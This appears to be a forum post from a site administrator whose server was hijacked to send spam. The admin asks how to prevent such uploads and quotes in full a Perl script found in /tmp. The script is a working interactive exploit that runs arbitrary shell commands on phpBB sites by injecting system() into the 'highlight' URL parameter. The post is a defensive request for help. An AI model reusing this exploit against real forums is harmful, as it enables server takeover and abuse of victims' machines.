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perl script uploaded to site

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ElricM

Guest
Two days ago, my site became super sluggish, I was configuring apache and got an error there no no available sockets, then I noticed I had almost 400,000 spam messages in the mail queue. So I rebooted the system, stopped the queue and deleted all the messages with qmail-remove. Today I found this in the /tmp directory:

/tmp/outlaw/trash4.pl
Code:
use strict;
use IO::Socket;

unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }

$ARGV[0] =~ m![url]http://[/url](.*?)/(.*?t=\d+)!;
my ($server, $port) = split (/:/,$1);
$port   = 80 unless defined($port);
$server  = $1 unless defined($server);
my ($url, $command) = $2;

print "$server - $port - $url\n";

while () {
		print "trash4> ";
		while(<STDIN>) {
				$command=$_;
				chomp($command);
				last;
		}
		&send($command);
}

sub send {
    my $ok	=	0;
    my $cmd	= "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
    my $string  = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
					"Host: $server\nPHP: $cmd\n\n\n\n";
    my $socket = IO::Socket::INET->new(PeerAddr => $server,
				PeerPort => $port,
				Proto    => "tcp",
				Type     => SOCK_STREAM)
				or die "can't connect to: $server : $@\n";
	print $socket $string;
	while(<$socket>) {
		if (/#PHPBBEXPLOIT#/) {
				close($socket) and last if $ok eq 2;
				$ok++;
				next;
		}
		print if $ok eq "1";
	}
}
exit 0;

How do you prevent/detect stuff like this from being uploaded and executed?
 
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